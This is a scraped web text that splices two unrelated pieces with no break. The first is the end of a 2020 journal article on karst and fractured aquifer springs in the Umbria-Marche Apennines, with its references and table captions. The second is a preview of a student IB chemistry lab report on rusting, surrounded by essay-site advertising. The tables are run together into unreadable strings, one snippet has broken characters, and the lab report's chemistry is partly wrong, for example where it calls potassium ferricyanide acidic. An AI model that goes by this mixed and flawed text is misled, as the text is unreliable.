bimodal behavior. Both auto-correlation and cross-correlation functions showed approximately the same results as the recession analysis. Bimodal aquifers showed a steep slope and a short lag time (2–13 days) followed by a gentle slope, whereas unimodal aquifers showed a somewhat uniform decrease with high delay times. In addition, both the CCF and the ACF indicate a large memory effect (over 80 days) and large response time (over 100 days), implying the dominance of the baseflow sub-regime. This suggests great inertia, showing how the aquifers filter the information given by rainfall events very well. Consequently, the analyzed aquifer systems highlight large storage capacity (very important for the water management) and the attenuation character. Taking into consideration the results achieved, it can be concluded that the structural and hydrogeological setting influences the structural properties of aquifers and, consequently, the groundwater circulation within the Apenninic carbonate sequence. The hydrostructures contained within the Maiolica Complex present a high fracturation degree and a slightly karstified rock mass, which exerts the dominant influence over infiltration and percolation. Here, groundwater circulation occurs within fracture networks and discharge is dominated by baseflow sub-regimes (probably with a Darcian flow), resulting in unimodal functionality. The aquifers contained within the Massiccio Complex, on the other hand, have a higher karstification degree, which controls water circulation characterized by different flow components. This complex is affected by moderately developed conduit networks, especially in the deeper aquifer zones, which results in a quickflow sub-regime and, therefore, dual behavior. Due to these specific characteristics, fractured and karst aquifers are of increasing interest because they represent a significant percentage of the world’s water supply. Aquifers are extremely vulnerable to the various sources of pollution; hence, the exploitation, maintenance of water quality, and the protection of fractured and karst aquifers are of vital importance. Therefore, the knowledge of recession coefficient is very helpful in water management. Author Contributions Conceptualization, A.T. and M.M.; methodology, M.M. and A.T.; software, A.T; validation, M.M.; formal analysis, A.T.; investigation, A.T. and M.M.; resources, M.M.; data curation, A.T. writing—original draft preparation, A.T.; writing—review and editing, A.T. and M.M.; funding acquisition, M.M.; All authors have read and agreed to the published version of the manuscript. Funding This research was supported by the University of Urbino. Department research budget 2019, resp.M.M. Acknowledgments The authors would like to express their gratitude to Daniela Piacentini for the data analysis discussion. We are also grateful to the ARPA Umbria and Hydrographic Service of Umbria Region for the data support for this study. Conflicts of Interest The authors declare no conflict of interest. References 1. Király, L. Modeling karst aquifers by the combined discrete channel and continuum approach. Bull. d’Hydrogéol. l’Univ. Neuchâtel. 1998, 16, 77–98. [Google Scholar] 2. Kiraly, L. Karstification and Groundwater Flow. In Evolution of Karst: From Prekarst to Cessation; Zalozba ZRC: Postojna, Ljubljana, 2002; pp. 155–190. [Google Scholar] 3. Kiraly, L.; Morel, G. Remarques sur l’hydrogramme des sources karstiques simulé par modéles mathe’matiques. Bull. Cent. d’Hydrogéol. Univ. Neuchatel. (Suisse) 1976, 1, 37–60. [Google Scholar] 4. Kovács, A.; Perrochet, P. A quantitative approach to spring hydrograph decomposition. J. Hydrol. 2008, 352, 16–29. [Google Scholar] [CrossRef] 5. Bonacci, O. Karst springs hydrographs as indicators of karst aquifers. Hydrol. Sci. J. 1993, 38, 51–62. [Google Scholar] [CrossRef] 6. Brodie, R.S.; Hostetler, S. A review of techniques for analysing base flow from stream hydrographs. In Proceedings of the NZHS-IAH-NZSSS 2005 Conference, Aukland, New Zeland, 28 November–2 December 2005. [Google Scholar] 7. Kresic, N.; Bonacci, O. Spring discharge hydrograph. In Groundwater Hydrology of Springs: Engineering, Theory, Management, and Sustainability, 1st ed.; Kresic, N., Stevanovic, Z., Eds.; Elsevier: Burlington, VT, USA, 2010; Volume 4, pp. 129–163. [Google Scholar] [CrossRef] 8. Boussinesq, J. Essai sur la théorie des eaux courantes, Mémoires présentés par divers savants à l’Académie des Sciences. XXIII 1877, 1, 1–680. [Google Scholar] 9. Maillet, E. Essais d’Hydraulique souterraine et fluviale, Librairie Scientifique; Primary Source Edition; A. Hermann: Paris, French, 1905; p. vi-218. [Google Scholar] 10. Mangin, A. Contribution a l’etude hydrodynamique des aquifères karstiques. Ann. Speleol. 1975, 26, 283–339. [Google Scholar] 11. Amit, H.; Lyakhovsky, V.; Katz, A.; Starinsky, A.; Burg, A. Interpretation of spring recession curves. Groundwater 2002, 40, 543–551. [Google Scholar] [CrossRef] 12. Kovács, A.; Perrochet, P.; Király, L.; Jeannin, P.Y. A quantitative method for the characterisation of karst aquifers based on spring hydrograph analysis. J. Hydrol. 2005, 303, 152–164. [Google Scholar] [CrossRef] [Green Version] 13. Fiorillo, F. The recession of spring hydrographs focused on karst aquifers. Water Resour. Manag. 2014, 28, 1781–1805. [Google Scholar] [CrossRef] 14. Drogue, C. Analyse statistique des hydrogrammes de décrues des sources karstiques. J. Hydrol. 1972, 15, 49–68. [Google Scholar] [CrossRef] 15. Malík, P. Assessment of regional karstification degree and groundwater sensitivity to pollution using hydrograph analysis in the Velka Fatra Mts., Slovakia. Environ. Geol. 2007, 51, 707–711. [Google Scholar] [CrossRef] 16. Giacopetti, M.; Materazzi, M.; Pambianchi, G.; Posevac, K. Analysis of mountain springs discharge time series in the Tennecola stream catchment (central Apennine, Italy). Environ. Earth Sci. 2017, 2017, 20. [Google Scholar] [CrossRef] 17. Nathan, R.J.; McMahon, T.A. Evaluation of automated techniques for base flow and recession analyses. Water Resour Res. 1990, 26, 1465–1473. [Google Scholar] [CrossRef] 18. Tallaksen, L. A review of baseflow recession analysis. J. Hydrol. 1995, 165, 349–370. [Google Scholar] [CrossRef] 19. Posavec, K.; Bačani, A.; Nakić, Z. A visual basic spreadsheet macro for recession curve analysis. Groundwater 2006, 44, 764–767. [Google Scholar] [CrossRef] 20. Posavec, K.; Parlov, J.; Nakić, Z. Fully automated objective-based method for master recession curve separation. Groundwater 2010, 48, 598–603. [Google Scholar] [CrossRef] 21. Gregor, M.; Malík, P. Construction of master recession curve using genetic algorithms. J. Hydrol. Hydromech. 2012, 60, 3–15. [Google Scholar] [CrossRef] [Green Version] 22. Fiorotto, V.; Caroni, E. A new approach to master recession curve analysis. Hydrol. Sci. J. 2013, 58, 966–975. [Google Scholar] [CrossRef] [Green Version] 23. Malík, P.; Vojtková, S. Use of recession-curve analysis for estimation of karstification degree and its application in assessing overflow/underflow conditions in closely spaced karstic springs. Environ. Earth Sci. 2012, 65, 2245–2257. [Google Scholar] [CrossRef] 24. Malík, P. Evaluating discharge regimes of karst aquifer. In Karst Aquifers-Characterization and Engineering; Stevanovic, Z., Ed.; Springer: Berlin, Germany, 2015; pp. 205–247. [Google Scholar] [CrossRef] 25. Box, G.P.E.; Jenkins, G.M. Time Series Analysis: Forecasting and Control; Holden-Day: San Francisco, CA, USA, 1970. [Google Scholar] 26. Mangin, A. Pour une meilleure connaissance des systmes hydrologiques h partir des analyses corrflatoire et spectrale. J. Hydrol. 1984, 67, 25–43. [Google Scholar] [CrossRef] 27. Padilla, A.; Pulido-Bosch, A. Study of hydrographs of karstic aquifers by means of correlation and cross-spectral analysis. J. Hydrol. 1995, 168, 73–89. [Google Scholar] [CrossRef] 28. Larocque, M.; Mangin, A.; Razck, M.; Banton, O. Contribution of correlation and spectral analyses to the regional study of a large karst aquifer (Charente, France). J. Hydrol. 1998, 205, 217–231. [Google Scholar] [CrossRef] 29. Panagopoulos, G.; Lambrakis, N. The contribution of time series analysis to the study of the hydrodynamic characteristics of the karst systems: Application on two typical karst aquifers of Greece (Trifilia, Almyros Crete). J. Hydrol. 2006, 329, 368–376. [Google Scholar] [CrossRef] 30. Jemcov, I.; Petrič, M. Measured precipitation vs. effective infiltration and their influence on the assessment of karst systems based on results of the time series analysis. J. Hydrol. 2009, 379, 304–314. [Google Scholar] [CrossRef] 31. Kresic, N.; Stevanovic, Z. Groundwater Hydrology of Springs: Engineering, Theory, Management and Sustainability, 1st ed.; Butterworth-Heinemann: Burlington, NJ, USA, 2010. [Google Scholar] 32. Centamore, E.; Deiana, G. La Geologia delle Marche. Studi Geol. Camerti 1986, Special Volume, 1–145. [Google Scholar] 33. Ciarapica, G.; Passeri, L. The paleographic duplicity of the Apennines. Boll. Soc. Geol. Ital. 2002, 121, 67–75. [Google Scholar] 34. Menichetti, M.; De Feyter, A.J.; Corsi, M. Crop 03dIl tratto della Val Tiberina-Mare Adriatico. Sezione geologica e caratterizzazione tettonico-sedimentaria delle avanfosse della zona umbro-marchigiano-romagnola. Studi Geol. Camerti. 1991, 1, 279–293. [Google Scholar] 35. Barchi, M.; De Feyter, A.; Magnani, M.B.; Minelli, G.; Pialli, G.; Sotera, B.M. The structural style of the Umbria-Marche fold and thrust belt. Soc. Geol. Ital. Mem. 1998, 52, 557–578. [Google Scholar] 36. Boni, C.; Bono, P.; Capelli, G. Schema idrogeologico dell’Italia Centrale. Mem. Soc. Geol. Ital. 1986, 35, 991–1012. [Google Scholar] 37. Capaccioni, B.; Didero, M.; Paletta, C.; Salvadori, P. Hydrogeochemistry of groundwaters from carbonate formations with basal gypsiferous layers: An example from Mt Catria-Mt Nerone ridge (Northern Apennines, Italy). J. Hydrol. 2001, 253, 14–26. [Google Scholar] [CrossRef] 38. Nanni, T.; Vivalda, P. The aquifers of the Umbria-Marche Adriatic region: Relationship between structural setting and groundwater chemistry. Boll. Soc. Geol. Ital. 2005, 124, 523–542. [Google Scholar] 39. Boni, C.; Petitta, M. Studio Idrogeologico per L’identificazione e la Caratterizzazione Degli Acquiferi che Alimentano le Sorgenti dei Corsi D’acqua Perenni dei Monti Sibillini, Esteso All’intera Area del Parco Nazionale; Rapporto definitivo; Contratto di studio e ricerca. Autorità di Bacino del Fiume Tevere—Parco Nazionale dei Monti Sibillini—Dipartimento Scienze della Terra Università di Roma “La Sapienza”; Università “La Sapienza”di Roma: Roma, Italy, 2007. [Google Scholar] 40. Boni, C.; Petitta, M. Redazione informatizzata della cartografia idrogeologica tematica del territorio della Regione Umbria. Tech. Note 2008, 2008, 131. [Google Scholar] 41. Boni, C.; Baldoni, T.; Banzato, F.; Cascone, D.; Petitta, M. Hydrogeological study for identification, characterisation and management of groundwater resources in the Sibillini Mountains National Park (central Italy). Ital. J. Eng. Geol. Environ. 2010, 2, 21–39. [Google Scholar] [CrossRef] 42. Mastrorillo, L. Elementi strutturali e caratteristiche idrogeologiche della dorsale carbonatica umbro-marchigiana. Mem. Soc. Geol. Ital. 2001, 56, 219–226. [Google Scholar] 43. Mastrorillo, L.; Baldoni, T.; Banzato, F.; Boscherini, A.; Cascone, D.; Checcucci, R.; Petitta, M.; Boni, C. Quantitative hydrogeological analysis of the carbonate domain in the Umbria region. Ital. Eng. Geol. Environ. 2009, 1, 137–155. [Google Scholar] 44. Menichetti, M.; Salvatori, F.; Reichembach, G. Contribution des essais de multitracages à la definition de l’hydrostructure carbonatique de Monte Cucco et de la source Scirca-Italie-Apennin Central. Ann. Sci. l’Univ. Besancon Geol. Mem. Hors Ser. 1988, 6, 347–364. [Google Scholar] 45. Boni, C.; Mastrorillo, L.; Preziosi, E. Simulazione numerica di acquiferi carbonatici: L’esempio della struttura Monte Maggio–Monte Penna (Nocera Umbra). Geol. Romana 1994, 30, 27–35. [Google Scholar] 46. Dragoni, W.; Mottola, A.; Cambi, C. Modeling the effects of pumping wells in spring management: The case of Scirca spring (central Apennines, Italy). J. Hydrol. 2013, 493, 115–123. [Google Scholar] [CrossRef] 47. Cambi, C.; Di Matteo, L.; Dragoni, W.; Valigi, D.; Frondini, F.; Boscherini, A.; Checcucci, R. Hydrogeological map of Gualdo Mountains North-Eastern Umbria. Explanatory Notes. Water budget of Jurassic and low Cretacicous hydrogeological complexes. Umbria Reg. Proj. Piano Ambient. 2006. [Google Scholar] [CrossRef] 48. Ardizzone, F.; Dragoni, W.; Marchetti, G.; Mariani, M.; Vacca, G. Definizione delle aree di salvaguardia della sorgente di Bagnara di Nocera Umbra. In Proceedings of the 3° Convegno Nazionale Sulla Protezione e Gestione Delle Acque Sotterranee Per il III Millennio, Parma, Italy, 13–15 October 1999; p. 3. [Google Scholar] 49. Dewandel, B.; Lachassagne, P.; Bakalowicz, M.; Weng, P.; Al-Malki, A. Evaluation of aquifer thickness by analysing recession hydrographs. Application to the Oman ophiolite hard-rock aquifer. J. Hydrol. 2003, 274, 248–269. [Google Scholar] [CrossRef] 50. Eisenlohr, L.; Király, L.; Bouzelboudjen, M.; Rossier, Y. Numerical versus statistical modelling of natural response of a karst hydrogeological system. J. Hydrol. 1997, 202, 244–262. [Google Scholar] [CrossRef] 51. Forkasiewicz, J.; Paloc, H. Le régime de tarissement de la Foux de la Vis. Etude preliminaire. Chron. d’Hydrogeol. 1967, 3, 61–73. [Google Scholar] 52. Ghasemizadeh, R.; Hellweger, F.; Butscher, C.; Padilla, I.; Vesper, D.; Field, M.; Alshawabkeh, A. Review: Groundwater flow and transport modeling of karst aquifers, with particular reference to the North Coast Limestone aquifer system of Puerto Rico. Hydrogeol. J. 2012, 20, 1441–1461. [Google Scholar] [CrossRef] [PubMed] [Green Version] 53. White, W.B. Conceptual models for karstic aquifers. Speleogenes. Evol. Karst Aquifers 2003, 1, 1–6. [Google Scholar] 54. Katsanou, K.; Lambrakis, N.; Tayfur, G.; Baba, A. Describing the karst evolution by the exploitation of hydrologic time-series data. Water Resour. Manag. 2015, 29, 3131–3147. [Google Scholar] [CrossRef] [Green Version] 55. Mayaud, C.; Wagner, T.; Benischke, R.; Birk, S. Single event time series analysis in a binary karst catchment evaluated using a groundwater model (Lurbach system, Austria). J. Hydrol. 2014, 511, 628–639. [Google Scholar] [CrossRef] [Green Version] 56. Box, G.E.P.; Jenkins, G.M.; Reinsel, G.C. Time Series Analysis: Forecasting and Control, 3rd ed.; Prentice Hall Inc.: Englewood Cliffs, NJ, USA, 1994. [Google Scholar] 57. Mangin, A. Utilisation des analyses correlatoire et spectrale dans l’approche des systemes hydrologiques. Comptes Rendusd Acad. Sci. 1981, 293, 401–404. [Google Scholar] 58. Mangin, A.; Pulido-Bosch, A. Aplicacion de los analisis de correlatorie spectral en el estudio de los acuiferos karsticos. Tecniterrae 1983, 51, 53–65. [Google Scholar] 59. Lo Russo, S.; Amanzio, G.; Ghione, R.; De Maio, M. Recession hydrographs and time series analysis of springs monitoring data: Application on porous and shallow aquifers in mountain areas (Aosta Valley). Environ. Earth Sci. 2015, 73, 7415–7434. [Google Scholar] [CrossRef] 60. Fiorillo, F.; Doglioni, A. The relation between karst spring discharge and rainfall by cross-correlation analysis (Campania, Southern Italy). Hydrogeol. J. 2010, 18, 1881–1895. [Google Scholar] [CrossRef] 61. Delbart, C.; Valdés, D.; Barbecot, F.; Tognelli, A.; Chouchoux, L. Spatial organization of the impulse response in a karst aquifer. J. Hydrol. 2016, 537, 18–26. [Google Scholar] [CrossRef] 62. Fiorillo, F.; Malik, P. Hydraulic behavior of Karst Aquifers. Water 2019, 11, 1563. [Google Scholar] [CrossRef] [Green Version] 63. Riggs, H.C. The base-flow recession curve as an indicator of groundwater. Int. Assoc. Sci. Hydrol. Publ. 1964, 63, 352–363. [Google Scholar] 64. Petras, I. An approach to the mathematical expression of recession curves. Water SA 1986, 12, 145–150. [Google Scholar] 65. Fiorillo, F. Tank-reservoir drainage as a simulation of the recession limb of karst spring hydrographs. Hydrogeol. J. 2011, 19, 1009–1019. [Google Scholar] [CrossRef] 66. Fiorillo, F.; Pagnozzi, M. Recharge processes of karst massifs: Example from southern Italy. Environ. Earth Sci. 2015, 1, 103–111. [Google Scholar] 67. Mohammadi, Z.; Shoja, A. Effect of annual rainfall amount on characteristics of karst spring hydrograph. Carbonates Evaporites 2014, 29, 279–289. [Google Scholar] [CrossRef] 68. Bailly-Comte, V.; Martin, J.B.; Jourde, H.; Screaton, E.J.; Pistre, S.; Langston, A. Water exchange and pressure transfer between conduits and matrix and their influence on hydrodynamics of two karst aquifers with sinking streams. J. Hydrol. 2010, 386, 55–66. [Google Scholar] [CrossRef] 69. Padilla, A.; Pulido-Bosch, A.; Mangin, A. Relative importance of baseflow and quickflow from hydrographs of karst spring. Groundwater 1994, 32, 267–277. [Google Scholar] [CrossRef] 70. Fu, T.G.; Chen, H.S.; Wang, K.L. Structure and water storage capacity of a small karst aquifer based on stream discharge in southwest China. J. Hydrol. 2016, 534, 50–62. [Google Scholar] [CrossRef] 71. Mastrorillo, L.; Petitta, M. Hydrogeological conceptual model of the Upper River basin aquifers (Umbria-Marche Apennines). Ital. J. Geosci. 2014, 133, 396–408. [Google Scholar] [CrossRef] 72. Boni, C.; Mastrorillo, M.; Cascone, D.; Tarragoni, C. Carta Idrogeologica Delle Dorsali Interne Umbro-Marchigiane (Scala 1:50.000); GNDCI-CNR: Rome, Italy, 2005; Volume 2865. [Google Scholar] 73. Centamore, E.; Micarelli, A. L’ambiente fisico delle Marche: Stratigrafia. Regione Marche, Assessorato Urbanistico; S.E.L.C.A.: Firenze, Italy, 1991. [Google Scholar] 74. Chiaudani, A.; Di Curzio, D.; Rusi, S. The snow and rainfall impact on the Verde spring behavior: A statistical approach on hydrodynamic and hydrochemical daily time-series. Sci. Total Environ. 2019, 689, 481–493. [Google Scholar] [CrossRef] [PubMed] 75. Pulido-Bosch, A.; Padilla, A.; Dimitrov, D.; Machkova, M. The discharge variability of some karst springs in Bulgaria studied by time series analysis. Hydrol. Sci. J. 1995, 40, 517–532. [Google Scholar] [CrossRef] 76. Cambi, C.; Valigi, D.; Di Matteo, L. Hydrogeological study of data-scarce limestone massifs: The case of Gualdo Tadino and Monte Cucco structures (central Apennines, Italy). Boll. Geofis. Teor. Appl. 2010, 51, 345–360. [Google Scholar] 77. Angelini, P.; Dragoni, W. The problem of modelling limestone spring: The case of Bagnara (North Apennines, Italy). Groundwater 1997, 35, 612–618. [Google Scholar] [CrossRef] 78. Fiorillo, F.; Revellino, P.; Ventafridda, G. Karst aquifer draining during dry period. J. Cave Karst Stud. 2012, 74, 148–156. [Google Scholar] [CrossRef] Figure 1. Simplified hydrogeological map of the study area at a regional scale (Northern Apennines), illustrating different geological and hydrogeological elements: a partial stratigraphic column of the Umbria-Marche stratigraphic succession spanning the Upper Triassic to the Upper Miocene; the locations of the studied aquifer springs: (1) Scirca spring, (2) Vaccara spring, (3) Boschetto spring, (4) Capo d’acqua spring, (5) San Giovenale spring, and (6) Bagnara spring; the hydrogeological recharge area boundaries; the locations of the rain gauge stations used: (a) Mt Cucco station, (b) Gualdo Tadino station, and (c) Nocera Umbra station. Figure 1. Simplified hydrogeological map of the study area at a regional scale (Northern Apennines), illustrating different geological and hydrogeological elements: a partial stratigraphic column of the Umbria-Marche stratigraphic succession spanning the Upper Triassic to the Upper Miocene; the locations of the studied aquifer springs: (1) Scirca spring, (2) Vaccara spring, (3) Boschetto spring, (4) Capo d’acqua spring, (5) San Giovenale spring, and (6) Bagnara spring; the hydrogeological recharge area boundaries; the locations of the rain gauge stations used: (a) Mt Cucco station, (b) Gualdo Tadino station, and (c) Nocera Umbra station. Water 12 01039 g001 Figure 2. Daily rainfall data provided by of the Hydrographic Service of Umbria Region for three rain gauge stations: MC (Monte Cucco), GT (Gualdo Tadino), and NU (Nocera Umbra). Figure 2. Daily rainfall data provided by of the Hydrographic Service of Umbria Region for three rain gauge stations: MC (Monte Cucco), GT (Gualdo Tadino), and NU (Nocera Umbra). Water 12 01039 g002 Figure 3. Discharge time series of the Umbria-Marche carbonate springs (data from ARPA Umbria). Figure 3. Discharge time series of the Umbria-Marche carbonate springs (data from ARPA Umbria). Water 12 01039 g003 Figure 4. Master Recession Curves of springs with bimodal behavior. (a) Scirca spring; (b) Vaccara spring; (c) Boschetto spring and (d) Bagnara spring. Figure 4. Master Recession Curves of springs with bimodal behavior. (a) Scirca spring; (b) Vaccara spring; (c) Boschetto spring and (d) Bagnara spring. Water 12 01039 g004 Figure 5. Master Recession Curves of springs with unimodal behavior. (a) Capo d’Acqua spring and (b) San Giovenale spring. Figure 5. Master Recession Curves of springs with unimodal behavior. (a) Capo d’Acqua spring and (b) San Giovenale spring. Water 12 01039 g005 Figure 6. Auto-correlation functions of the analyzed aquifer springs; (a) Scirca spring, (b) Vaccara spring, (c) Boschetto spring, (d) Capo d’Acqua spring, (e) San Giovenale spring, and (f) Bagnara spring. Figure 6. Auto-correlation functions of the analyzed aquifer springs; (a) Scirca spring, (b) Vaccara spring, (c) Boschetto spring, (d) Capo d’Acqua spring, (e) San Giovenale spring, and (f) Bagnara spring. Water 12 01039 g006 Figure 7. Cross-correlation functions of the analyzed aquifer springs; (a) Scirca spring, (b) Vaccara spring, (c) Boschetto spring, (d) Capo d’Acqua spring, (e) San Giovenale spring, and (f) Bagnara spring. Figure 7. Cross-correlation functions of the analyzed aquifer springs; (a) Scirca spring, (b) Vaccara spring, (c) Boschetto spring, (d) Capo d’Acqua spring, (e) San Giovenale spring, and (f) Bagnara spring. Water 12 01039 g007 Figure 8. Geological sketch of flow dynamics in the carbonate hydrostructures: geological cross-section, graphics of recession curves (MRC analysis), and their relative equations describing karst spring discharge. Figure 8. Geological sketch of flow dynamics in the carbonate hydrostructures: geological cross-section, graphics of recession curves (MRC analysis), and their relative equations describing karst spring discharge. Water 12 01039 g008 Table 1. General characteristics of the carbonate complexes and their related catchment areas (geographic coordinates are expressed in WGS84 UTM Zone 33N). Table 1. General characteristics of the carbonate complexes and their related catchment areas (geographic coordinates are expressed in WGS84 UTM Zone 33N). Hydro- Structures SpringLatitudeLongitudeSpring Altitude (m a.s.l.) Recharge Area (km2) Mt CuccoScirca323,040.18214,774,571.74345758.0 Mt MaggioVaccara325,711.26784,774,969.12544686.2 Mt PennaBoschetto324,530.51644,782,340.280953811.5 Mt PennaCapo d’Acqua316,236.39564,802,705.21765707.4 Mt BurellaSan Giovenale301,037.89234,823,140.706648010.5 Mt PenninoBagnara321,608.11344,783,863.20126304.9 Table 2. Location and characteristics of rain gauge station (geographic coordinate system is expressed in WGS84 UTM Zone 33). Table 2. Location and characteristics of rain gauge station (geographic coordinate system is expressed in WGS84 UTM Zone 33). Rain Gauge Station Gauge Station Code LatitudeLongitudeMonitored Period Station Altitude (m a.s.l.) Mt CuccoMT-13015316,280.83884,805,532.52742007–20151116 Gualdo TadinoGT-27422321,232.29804,789,176.77402007–2015563 Nocera UmbraNU-12907320,698.88254,775,721.44082007–2015542 Table 3. General characteristics of the time-series of the analyzed aquifer springs. Table 3. General characteristics of the time-series of the analyzed aquifer springs. SpringMonitored PeriodNo. of All DataNo. Miss DataTime-Series Lag (%) Scirca2007–201531861073.4 Vaccara2007–2015309775424.3 Boschetto2007–201531942467.7 Capo d’Acqua2007–20153232551.7 San Giovenale2007–201521071805.8 Bagnara2007–20153240471.5 Table 4. Characteristics of recession curves of springs with bimodal behavior and their related sub-regimes (baseflow or quickflow). Table 4. Characteristics of recession curves of springs with bimodal behavior and their related sub-regimes (baseflow or quickflow). SpringNo. of Recession SegmentsQb1 (l/s) αb (d−1) tb (day) Qq2 (l/s) αq (d−1) tq (day) Scirca81800.00602252200.025150 Vaccara7900.00532002200.08060 Boschetto71800.00652006500.10050 Bagnara61200.00853001800.015200 1 b = baseflow; 2 q = quickflow. Table 5. Recession curve characteristics of aquifer springs with unimodal behavior. Table 5. Recession curve characteristics of aquifer springs with unimodal behavior. SpringNo. of Recession SegmentsQ (l/s) α (d−1) tr (day) Capo d’acqua41450.0074200 San Giovenale63800.0115200 Table 6. Time series analysis parameters: system memory effect, maximum discharge/rainfall cross-correlation coefficient, and time lag for maximum cross-correlation coefficient (Q discharge). Table 6. Time series analysis parameters: system memory effect, maximum discharge/rainfall cross-correlation coefficient, and time lag for maximum cross-correlation coefficient (Q discharge). Aquifer SpringMemory Effect (days)Cross-Correlation Coef.Time LagSS (days) Scirca800.2413 Vaccara900.182 Boschetto890.272 Capo d’Acqua900.1874 San Giovenale1500.18119 Bagnara1210.2039 Table 7. Karstification degrees of spring recharge areas according to recession curve parameters, after [15,23]. Table 7. Karstification degrees of spring recharge areas according to recession curve parameters, after [15,23]. SpringCharacteristics of Recession Curve ParametersKarstification Degree Scircaαb > 0.0043 αc < 0.060 3.7 Vaccaraαb = 0.0041 to 0.018 αc = 0.055 to 0.16 4.0 Boschettoαb = 0.0041 to 0.018 αc = 0.055 to 0.16 4.0 Bagnaraαb > 0.0043 αc < 0.060 3.7 Capo d’Acquaα > 0.0072.3 San Giovenaleα > 0.0072.3 Share and Cite MDPI and ACS Style Tamburini, A.; Menichetti, M. Groundwater Circulation in Fractured and Karstic Aquifers of the Umbria-Marche Apennine. Water 2020, 12, 1039. https://doi.org/10.3390/w12041039 AMA Style Tamburini A, Menichetti M. Groundwater Circulation in Fractured and Karstic Aquifers of the Umbria-Marche Apennine. Water. 2020; 12(4):1039. https://doi.org/10.3390/w12041039 Chicago/Turabian Style Tamburini, Andrea, and Marco Menichetti. 2020. "Groundwater Circulation in Fractured and Karstic Aquifers of the Umbria-Marche Apennine" Water 12, no. 4: 1039. https://doi.org/10.3390/w12041039 Note that from the first issue of 2016, this journal uses article numbers instead of page numbers. See further details here. Article Metrics Back to TopTop
• Join over 1.2 million students every month • Accelerate your learning by 29% • Unlimited access from just £6.99 per month product of rusting Extracts from this document... Introduction IB 2 Lab Report 14 - Product of Rusting Design Aim: The purpose of this experiment is to detect the metal oxidation that will lead to rust by using a ferroxyl indicator solution in the presence of Fe2+ ions. Hypothesis: The reaction would most probably occur in an acidic solution and it would be more pronounced on the nails where the surface area is greater and the metal is weaker. General Background: The rusting of iron is primarily due to attack by hydrogen ions. "In order that rust should be formed iron must go into solution and hydrogen must be given off in the presence of oxygen or certain oxidizing agents. This presumes electrolytic action, as every iron ion that appears at a certain spot demands the disappearance of a hydrogen ion at another, with a consequent formation of gaseous hydrogen. The gaseous hydrogen is rarely visible in the process of rusting, owing to the rather high solubility and great diffusive power of this element. Substances which increase the concentration of hydrogen ions, such as acids and acid salts, stimulate corrosion, while substances which increase the concentration of hydroxyl ions inhibit it."1 Hence, in order for the experiment to be conducted, an acidic solution would be required. This would be done by using the oxidizing agent - potassium ferricyanide (K3Fe(CN)6). ...read more. Middle NaOH of solution A Observation: solution turned pinkish - red Step 5: reaction of iron nails with solution A Observation: a deep blue outline of the nail of similar colour to the one in step 2 was obtained. Furthermore, it was noticed that the colour was darker on the outside part of the bent nail. Moreover, there were tiny pink spots in the shape (outline) but were not easily distinguishable. Data Processing Analysis of the various steps: Step 1: 15cm3 of 3% NaCl solution, 4 drops of 10% K3Fe(CN)6 solution and 2 drops of phenolphthalein indicator were combined to form a ferroxyl indicator solution. Rusting is a slow process when it undergoes naturally, hence in order to perform a quick study, it was necessary to stimulate the rusting to take place faster. Hence, K3Fe(CN)6 was used as an acidic oxidizing agent. The acidity of the solution would allow the dissociation of ions in the NaCl solution to give Na+, Cl-, H+ & OH-. This is important because in order for rusting to take place, hydrogen ions are needed so that Fe can go into solution and H2 gas is liberated. Furthermore, "the more ionized the solution is, the higher its electrical conductivity, and the more rapid damage to the underlying iron."2 Thus, a more acidic solution would lead to faster ionization of the NaCl solution. ...read more. Conclusion The second reason is that due to the bending, that part of the nail became weaker due to stress and hence it was easily corroded. This effect is known as pitting. On the other hand, the straight nail had no such darker spots in its outline. In addition to that, the slight pink spots observed on the paper napkin indicate that some parts of the nails contained more iron and hence were slightly more electropositive, thus attracting the OH- ions and giving the pinkish colour. The deep blue colour also indicates that the ions of iron were Fe2+. Conclusion and Evaluation From my experiment, I conclude that the product of rusting in this case was Fe2+ ions. Furthermore, I noticed that rusting occurs faster when the iron is in contact with an acidic salt solution. In addition to that, when parts of the object are weaker, they are corroded more easily and rapidly. Moreover, the amount of surface area exposed also affects the rate of rusting. Overall, the experiment performed was quite adequate and all the factors were taken into account. Although, the two nails could be kept for a longer time in the petri -dish to obtain more distinct results. In order to further study the action of rusting, the iron nails could be compared with steel nails and/or galvanized nails to see how fast or slow rusting occurs in each case. ...read more. The above preview is unformatted text This student written piece of work is one of many that can be found in our International Baccalaureate Chemistry section. Found what you're looking for? • Start learning 29% faster today • 150,000+ documents available • Just £6.99 a month Not the one? Search for your essay title... • Join over 1.2 million students every month • Accelerate your learning by 29% • Unlimited access from just £6.99 per month See related essaysSee related essays Related International Baccalaureate Chemistry essays 1. A comparison of various proprieary antacids was more effective than the other by seeing the number of moles of hydrochloric acid neutralised, this may not give a proper justification as to the performance of each antacid. The stomach is a much more complex organ whereby there are lots of specialised cells performing specific functions. 2. Investigate the rate of reaction of luminol in various factors. The objective was to ... time taken for chemiluminescence, which means start from the time it glows until it decays to a certain point. A preliminary experiment is done as a sample for end point and to give an approximation of time. The data is first collected by using colorimeter, to measure the rate of change of colour in a certain period. 1. DCP+CE Analysis of a Hydrogen Peroxide Solution Also, in the 2nd titration, the molar ratio between MnO4- with H2O2 in the titration with Mn2+ is 2:5, whereas the molar ratio between MnO4- with H2O2 in the titration with MnO2 is 2:1. Therefore, it is clearly visible that in the process where there is an insufficient amount of 2. Crystallization - Rock candy is collection of sugar crystal. then dangle a rough object into the solution the same method that you use to make the bigger crystal. Furthermore, what is Alum? Alum is a salt that in chemistry is a combination of an alkali metal, such as sodium, potassium, or ammonium and a trivalent metal, such as aluminium, iron or chromium. 1. Effect of concentration on Nacl solution The magnitude of the charge on the ions. The concentration of the ions in the solution. The liquid used to dissolve the ionic substances in. The size of the ions. I would like to investigate that how the concentration of the ions in the solution affects the electric conductance of the solution. 2. Espuma a base de cscara de pia El isocianato es altamente reactivo, ya que est� compuesto de tres elementos muy fuertes, el ox�geno, el carbono y el nitr�geno, por lo que hace que tenga una tendencia a recuperar el hidr�geno que ten�a en el �cido isoci�nico. Hay cuatro tipos de isocianato que son preferidos en la industria 1. Ions important to human health - Iron is one of the most important ions ... Iron absorption is influenced by other dietary factors. About 50% of iron from breast milk is absorbed but only about 10% of iron in the whole cow's milk is absorbed. The reason for the higher absorption of iron from breast milk is unknown. 2. Research question: how to convert NaOH to NaCl by two different routes , and ... The lab-quest was set to start the recording of the temperature of the water. 4. A solution of sodium hydroxide is made by adding 4.0 g sodium hydroxide to the of water in the thermous. 1. Temperature is collected every 30 seconds until it reaches the original temperature 2. • Over 160,000 pieces of student written work • Annotated by experienced teachers • Ideas and feedback to improve your own work
